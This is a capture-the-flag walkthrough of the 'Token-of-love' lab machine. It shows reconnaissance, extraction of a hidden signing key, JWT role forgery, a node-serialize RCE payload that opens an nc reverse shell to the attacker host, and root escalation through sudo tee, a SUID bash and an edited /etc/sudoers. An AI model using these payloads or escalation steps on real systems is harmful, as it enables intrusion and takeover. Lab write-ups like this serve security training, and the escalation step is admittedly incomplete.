Token-of-love

Target description

I. Information gathering

1. Host discovery

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:46 CST
Nmap scan report for 192.168.2.1
Host is up (0.00018s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00026s latency).
MAC Address: 08:00:27:0B:D1:2B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.20
Host is up (0.0012s latency).
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.09 seconds

Target IP: 192.168.2.20

2. Port scanning

1) Full port scan

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap --min-rate 10000 -p- 192.168.2.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:48 CST
Nmap scan report for 192.168.2.20
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds

Open ports: 22, 80

2) Service and version scan

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80 192.168.2.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:50 CST
Nmap scan report for 192.168.2.20
Host is up (0.00069s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.30 seconds
  1. Port 22: SSH, OpenSSH 9.2p1 (Debian 12)
  2. Port 80: HTTP, Apache httpd 2.4.62 (Debian)

3) Vulnerability script scan

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap --script=vuln -p22,80 192.168.2.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:51 CST
Nmap scan report for 192.168.2.20
Host is up (0.00076s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.20
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.2.20:80/
| Form id: username
| Form action: /
|
| Path: http://192.168.2.20:80/register
| Form id: username
|_ Form action: /register
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /register/: Potentially interesting folder
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 64.30 seconds

The http-enum script reports a /register directory on the web service. The http-csrf hits are only the login and register forms lacking anti-CSRF tokens; worth noting, but not the way in.

II. Exploitation

1. Web service on port 80

Visiting the site shows a login form.

Using the /register path found above, register an account and log in; that gets us into the application.

The page shows these messages:

**administrador** (2025/2/18 10:00:29): Bienvenido. En Token Of Love, la pasión por la ciberseguridad se une al amor digital.
(Welcome. In Token Of Love, passion for cybersecurity meets digital love.)

**administrador** (2025/2/18 10:00:29): Dicen que las claves viajan por rutas interplanetarias, vagando por el espacio infinito y estando en todas partes a la vez… ¿será magia o pura tecnología? 😉🔮 bafybeicbqiitqxhqx47qenneilgb2ckdpweoxxkdmcnx4pda654l733lxu
(They say the keys travel along interplanetary routes, wandering through infinite space and being everywhere at once… magic, or pure technology? 😉🔮 bafybeicbqiitqxhqx47qenneilgb2ckdpweoxxkdmcnx4pda654l733lxu)

Viewing the page source reveals further hints:

Busca el conejo hacker amoroso en un mundo interplanetario !
(Look for the loving hacker rabbit in an interplanetary world!)
Solo los usuarios admin pueden enviar mensajes
(Only admin users can send messages)

1) IPFS

"Interplanetary", "everywhere at once" and a string starting with bafy... all point to IPFS (the InterPlanetary File System); the string is a content identifier (CIDv1, base32-encoded). Install an IPFS client (Kubo's `ipfs get <cid>` works) and fetch the object behind bafybeicbqiitqxhqx47qenneilgb2ckdpweoxxkdmcnx4pda654l733lxu.

After downloading, `file` reports a WebP image:

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ file miao
miao: RIFF (little-endian) data, Web/P image

Check it with imgconceal, a steganography tool that supports WebP cover images:
https://github.com/tbpaolini/imgconceal

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo mv miao miao.webp

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ ./imgconceal --check=miao.webp
Input password for the hidden file (may be blank)
Password:
Scanning cover image for suitable carrier bits... Done!
Found file 'private.key':
hidden on: Fri Feb 14 01:49:04 2025
last access: Fri Feb 14 01:40:31 2025
last modified: Thu Feb 13 08:38:30 2025
size: 1.70 KB

The cover image 'miao.webp' can hide approximately more 391.77 KB (after compression of hidden data).

The image carries a hidden file, private.key.

Extract it:

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo ./imgconceal --extract=miao.webp --no-password --output=private
Scanning cover image for suitable carrier bits... Done!
SUCCESS: extracted 'private.key' from 'miao.webp'.
hidden on: Fri Feb 14 01:49:04 2025

We now have a private key (an unencrypted PKCS#8 RSA key, judging by the BEGIN PRIVATE KEY header):

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo cat private/private.key
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCq9/ZGu21YSX7c
nJ2E0v2w6adGuMhApMmBSe4DLKGpRAXQZtwy2UslqRZUt1vbefmvBboC9f11cfMb
gWaPturLwYQo/qLf8bNnMQww63MXsFAUmcgf24LSEi+faFr776IR/1+U8U76oSOW
buouGahGGWt74Pwdv/xXmqbZUNxXZOdrxDgixhV/UipWkxnex4GRphFe4KBcT/0i
1qAdgxpgDQbjVj5g+mmceOpSnc1gbsrtsEjgbWSvDEAWplNlRlAiUF0np6PqgpUL
OuxRTMHlj4Gdb7YfHp8Mz6KTgKE1+ko4vusvKq+9UqcgyUHW8VCmWvhFZ6iedRJ0
Ayzm+P1XAgMBAAECggEASm8HMTdDfUcOLNUgvSWw3ndzZNZpFL/JnPjHX2lsfomH
cHp/zsGMtno9pydnHhAmNN1s5QIc1aeFHIoDUXllEs2PENv/pDkSDtCrSpcPdhZE
XxuupbQHahcR1bh0uC/VozlH70v5wyMpn8JtQSHZgZ9qjLXgfcFKhwdlMcLDE2a7
2S5xac3OCQSD6Dak0pwTcnjUiQb43H6sR9d6DY6eMBTrCH+nJdHh3vOathhIzlj7
uDPYc5o5E6Ui6JJmrRt5H4FSAIzati3qw3+eE9hRbYqNJtYnQcxWXSY2HbLX8ooh
LUcAGm23+RSy7cBfdIQUSjWROqk6oE9XZaP6JE3YaQKBgQDegPsKL+6jBH16LKo3
vSm1vVh0aq87yv2zhTPNMctM30hOKzQqfNOt4yJQ5j86hEqMr1iHrgXOMRmxZAHt
Y330s50nva2aV2DekY6KZHk2prUfwMYp+UjAGL5ehRJ3goI5eD+Eo8+NIwk4hecM
kxnaBktuXjvhHaI5VZOTxr57GQKBgQDEtODMSu3OsqtDmQVyMjBiR5W1l8dp9vn3
jRo2uRc2EEKh2rOQxFJy4UYcg8O5Ekp0irD8jr7GGrHgTF+9o3u0k37h8AOZdR94
Yj5UGo3hkYzcSyAmg+5IauLNATXKAkMsF1VwRDLp34PWL3BDcS63LF6f+iSl9vYR
FVNlWoe57wKBgDxqYz/R4gcrmfKJnDKET4YEgrchnLEsnhSXr4gg5CXcXuKywnhi
6otFqDS1QCfgcemfVveIXhUtqd9L22Yc5L+D4cE/tJq67ReiCEU1oOAhBf84NdaB
1KosTcyWb3w52KhIKV8Xp6yX/dH2MdVtP9C+cs7mEXY/uKO+w9KVXXVJAoGAfMSC
BfLM7htz+Dd6NdnRyLTBJ+Ky0Oqf2L4+T1GNgHRF32XaGcv8w/NRxkppfd01LsC9
zCQ6q2tJQg0PeTjWAU7A30ye69pXcMNX537EWbw5jY11QhjSrkplu0S2OoC+3Juc
TM5lQOTOOa/zVEPZLsRM7Mn8Luz7XRCayiHnDy8CgYBsSiu45tsvRRKmMNY4Gxb5
6s2rgGPKbDxmXc4s5xqAqNi6MmFxcZQGkmw8Unzd1QB9HeFGlJGuqIeIj5kRLepL
4mKP3UvXUZGHWIl4MNSoqPh8u1Sq2P4W/K+NOlKTXnmrvldF+VxYaRTdqQ46+h3k
PkDtOtToiExm8jdJZ5lNdw==
-----END PRIVATE KEY-----

Derive the public key from the private key. Despite the output file name, `openssl rsa -pubout` writes a SubjectPublicKeyInfo block (BEGIN PUBLIC KEY), not PKCS#1; that is the form JWT libraries and jwt.io expect.

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo openssl rsa -in private/private.key -pubout -out pkcs1.pub
writing RSA key

View the public key:

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo cat pkcs1.pub
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqvf2RrttWEl+3JydhNL9
sOmnRrjIQKTJgUnuAyyhqUQF0GbcMtlLJakWVLdb23n5rwW6AvX9dXHzG4Fmj7bq
y8GEKP6i3/GzZzEMMOtzF7BQFJnIH9uC0hIvn2ha+++iEf9flPFO+qEjlm7qLhmo
Rhlre+D8Hb/8V5qm2VDcV2Tna8Q4IsYVf1IqVpMZ3seBkaYRXuCgXE/9ItagHYMa
YA0G41Y+YPppnHjqUp3NYG7K7bBI4G1krwxAFqZTZUZQIlBdJ6ej6oKVCzrsUUzB
5Y+BnW+2Hx6fDM+ik4ChNfpKOL7rLyqvvVKnIMlB1vFQplr4RWeonnUSdAMs5vj9
VwIDAQAB
-----END PUBLIC KEY-----

2) Logic flaw: JWT role claim

Looking at the login traffic, the `token` cookie is a JWT. Its header `eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9` decodes to {"alg":"RS256","typ":"JWT"}: the token is RSA-signed, not encrypted, so anyone can read the claims, and anyone holding the private key can mint tokens the server will accept.

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJtaWFvIiwicm9sZSI6InVzZXIiLCJpYXQiOjE3Mzk4NDQwODksImV4cCI6MTczOTg0NzY4OX0.UEQT7JzngvLbAkWLfq5mi1EQx1d8DTvZhbV1Cn_yydWlGFNdRTQ_KwTyKY_HGNwxqWXLeIB5jLS81ZH65UI9K82m7JrErLeo-UhXft9s6p__3_wajquk-yd0A_-yT-5i-HXlzY3m_CFjBuItNwgTTWP5fzvnOHqHw2ISsxcXlzpx4v-51cRSPOJIiBfcnn71E3yaVevlO5lU6_se2jAY5iHoSddA1_0YV0HsXkOLf49EcAvHW2xddq7VYNIWacWrFBSTZzByTequMkdsn5y945eczfRMLd92I5iXRRFhVIwqwrhcYevou9jmCyp0Q-8mgOiCSOlyYcc0GS7XNmufnA

Decoding it on jwt.io gives the payload {"id":2,"username":"miao","role":"user","iat":1739844089,"exp":1739847689} (a one-hour lifetime).

The private key pulled out of the image is the server's signing key. Paste it together with the derived public key into jwt.io, set the role claim to admin (the page-source hint says only admin users may post, so role is what the app checks), and jwt.io produces a token with a valid RS256 signature. The public key only lets us verify; the leaked private key is what makes forging possible.

Replace the cookie with the forged token and we are logged in as admin.

Intercept a send-message request in the proxy; the captured request has to carry the admin cookie.

  • At first no command was executed.

Breaking the format of the data field so that the server errors out shows that the message is being deserialized by Node.js. The `_$$ND_FUNC$$_` prefix in the PoC below is the function marker used by the node-serialize package's unserialize(), which passes any string carrying that marker to eval(); written as an immediately-invoked function expression, the payload runs on the server as soon as the message is deserialized.

PoC shared by a member of the group:

{"data":"{\"text\":\"_$$ND_FUNC$$_function(){require('child_process').exec('nc -e /bin/bash 192.168.2.4 6666', function(error,stdout, stderr) { console.log(stdout) });}( )\"}"}

Reverse shell received:

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.20] 37526
id
uid=1000(cupido) gid=1000(cupido) grupos=1000(cupido),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
  • Upgrade to a fully interactive shell:

script /dev/null -c bash
# press Ctrl+Z to suspend it
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

Read user.txt:

bash-5.2$ cat /home/cupido/user.txt
2032f531b474172175d02465b0a4941c

III. Privilege escalation

Check which commands the current user may run with sudo:

bash-5.2$ sudo -l
sudo -l
Matching Defaults entries for cupido on tokenoflove:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User cupido may run the following commands on tokenoflove:
(eros) NOPASSWD: /usr/bin/tee

cupido may run tee as eros without a password, which is arbitrary file write as eros. Use it to write the string `chmod +s /bin/bash` into /home/eros/miao.txt, the aim being to get /bin/bash set SUID root. Two caveats: tee on its own only writes the file, so something on the host must execute miao.txt with root privileges for the chmod to happen (the writeup does not show what; inspect cron entries and timers if you are reproducing this), and tee without -a overwrites the target file.

bash-5.2$ echo 'chmod +s /bin/bash' | sudo -u eros tee /home/eros/miao.txt
chmod +s /bin/bash

Once /bin/bash is SUID root, `bash -p` keeps the effective uid 0 (confirm with `id` before going further; it should report euid=0(root)). From that shell, append a passwordless sudo rule for cupido to /etc/sudoers:

bash -p
bash-5.2$ echo 'cupido ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers

Get root:

bash-5.2$ sudo su -                                                
sudo su -
root@tokenoflove:~# id
id
uid=0(root) gid=0(root) grupos=0(root)

ROOT FLAG

root@tokenoflove:~# cat /root/root.txt
cat /root/root.txt
e0772277e3cdf59b65c6b76df5b84ea6

Token-of-love
http://miao-sec.github.io/Thehackerslabs/Token-of-love/
Author
Miao
Published
2025-08-21
License
BY-MIAO